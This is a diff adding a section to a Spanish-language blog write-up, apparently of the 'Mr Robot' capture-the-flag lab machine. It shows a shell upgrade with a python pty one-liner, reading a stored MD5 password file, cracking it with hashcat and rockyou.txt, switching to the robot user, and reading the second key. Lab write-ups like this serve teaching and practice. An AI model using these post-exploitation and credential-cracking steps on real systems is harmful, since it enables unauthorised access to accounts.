--- a/_posts/2021-11-01-MrRobot.md
+++ b/_posts/2021-11-01-MrRobot.md
@@ -174,5 +174,56 @@ uid=1(daemon) gid=1(daemon) groups=1(daemon)
 /bin/sh: 0: can't access tty; job control turned off
 ```
 
+- Cambiamos la bash por python por una terminal "mejor"
 
+```bash
+$ python -c 'import pty; pty.spawn("/bin/bash")'
+daemon@linux:/$ 
+```
 
+- al movernos al directorio _home/robot_ encontramos archivos interesantes
+
+```bash
+daemon@linux:/home/robot$ ls
+ls
+key-2-of-3.txt	password.raw-md5
+```
+
+no podemos leer el archivo que inicia con *key*, sin embargo, con *password.raw-md5* la historia es otra
+lo abrimos e intuimos (como su nombre lo indica) que es una key encriptada con _md5_
+
+```bash
+daemon@linux:/home/robot$ cat key-2-of-3.txt
+cat key-2-of-3.txt
+
+cat: key-2-of-3.txt: Permission denied
+daemon@linux:/home/robot$ cat password.raw-md5
+
+cat password.raw-md5
+robot:c3fcd3d76192e4007dfb496cca67e13b
+```
+
+intentaremos desencriptar el _hash_
+
+```bash
+>echo "c3fcd3d76192e4007dfb496cca67e13b" > key-md5.txt
+
+>hash-identifier c3fcd3d76192e4007dfb496cca67e13b
+
+❯ hashcat -m0 --force key-md5.txt /home/blanco/Desktop/thm/MrRobot/rockyou.txt
+```
+luego de la espera,tenemos la contraseña del usuario _robot_
+obtenemos la flag y buscamos la manera de escalar privilegios
+
+```bash
+aemon@linux:/home/robot$ su robot
+su robot
+Password: xbxxexxhxjxlxxxpxxstxvwxxz
+
+robot@linux:~$ ls
+ls
+key-2-of-3.txt	password.raw-md5
+robot@linux:~$ cat ke*
+cat ke*
+82xc7x956x84fx93xxxbxdexebx9f959
+```
